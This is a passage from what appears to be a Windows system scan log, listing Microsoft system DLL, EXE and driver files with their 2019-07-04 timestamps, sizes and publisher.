Corporation) C:\WINDOWS\system32\SyncAppvPublishingServer.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000022024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScriptRunner.exe 2019-07-04 19:27 - 2019-07-04 19:27 - 000021304 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\appvetwstreamingux.dll 2019-07-04 19:27 - 2019-07-04 19:27 - 000011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 017786368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 014816256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 009917752 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 007887440 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 007636616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 006535224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 006224296 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 006068328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 004562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 004552336 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 004470784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 004012032 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 004008960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Service.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 003914480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 003748864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 003725312 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 003697664 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 003654656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 003590968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 003550720 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 003372232 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 003327256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 003263488 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 003261440 _____ (Microsoft Corporation) C:\WINDOWS\system32\esent.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 003106304 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002990608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 002876416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esent.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002871824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 002870784 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002799616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 002771008 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002725376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 002697728 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002654208 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002587320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002561536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002550584 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002490712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002443264 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002306048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002281472 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002258336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 002232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001999440 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001979392 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcDesktopMonSvc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001918976 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001856000 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001856000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConstraintIndex.Search.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001841152 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001815040 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001781248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001761792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001745408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001743672 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001721344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001721144 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001697280 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001690624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001687552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wpc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001651848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001635328 _____ (Microsoft Corporation) C:\WINDOWS\system32\TaskFlowDataEngine.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001633648 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001608704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001458176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001437184 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocoreworker.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 001393960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001375232 _____ (Microsoft Corporation) C:\WINDOWS\system32\APMon.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001366528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001362432 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001345024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wpc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001313792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001304888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContentDeliveryManager.Utilities.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001262864 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001250432 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 001155416 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 001101312 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001092096 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001063944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001042944 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL 2019-07-04 19:26 - 2019-07-04 19:26 - 001040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 001006592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000984376 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000919040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000916480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000892696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000889152 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000878080 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL 2019-07-04 19:26 - 2019-07-04 19:26 - 000876856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000875008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000862720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Service.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000858112 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000836608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000810512 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000772656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000771584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000740664 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000739328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000706544 _____ (Microsoft Corporation) C:\WINDOWS\system32\mscms.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000702464 _____ (Microsoft Corporation) C:\WINDOWS\system32\agentactivationruntime.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000680760 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vpnike.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000675328 _____ (Microsoft Corporation) C:\WINDOWS\system32\agentactivationruntimewindows.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000674816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000674072 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000673080 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000667648 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000645632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000644096 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000642008 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000637968 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000602432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mscms.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000594944 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000586552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SppExtComObj.Exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000550400 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000531968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000531464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000516608 _____ (Microsoft Corporation) C:\WINDOWS\system32\usosvc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000513336 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000511288 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000509440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000477496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS 2019-07-04 19:26 - 2019-07-04 19:26 - 000474112 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000467456 _____ (Microsoft Corporation) C:\WINDOWS\system32\FWPUCLNT.DLL 2019-07-04 19:26 - 2019-07-04 19:26 - 000464696 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000462336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.ConversationalAgent.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ks.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000443904 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000441144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000435200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000425056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000415544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000392192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000390456 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000388608 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationControllerPS.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000353960 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000336752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSrvPolicyManager.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000336384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000327680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000324624 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcommdlg.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000317952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000308736 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000307712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000283136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000280576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000268288 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3svc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateDeploymentProvider.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000250880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winnat.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000246784 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerCsp.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000242688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_CapabilityAccess.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000233984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallServiceTasks.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000214032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ifsutil.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000211968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFilterHost.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000197632 _____ (Microsoft Corporation) C:\WINDOWS\system32\Win32CompatibilityAppraiserCSP.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000187920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ifsutil.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\AarSvc.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000182072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msgpioclx.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000180536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wfplwfs.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000180024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ulib.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallServiceTasks.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000164152 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000160768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000159232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BitLockerCsp.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000149512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ulib.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleprn.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000142544 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicensingUI.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000129848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mup.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssitlb.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000127064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000117048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bindflt.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000115200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleprn.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000115120 _____ (Microsoft Corporation) C:\WINDOWS\system32\phoneactivate.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\agilevpn.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssitlb.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000103936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3msm.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000102216 _____ (Microsoft Corporation) C:\WINDOWS\system32\changepk.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3api.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000089544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3api.dll 2019-07-04 19:26 - 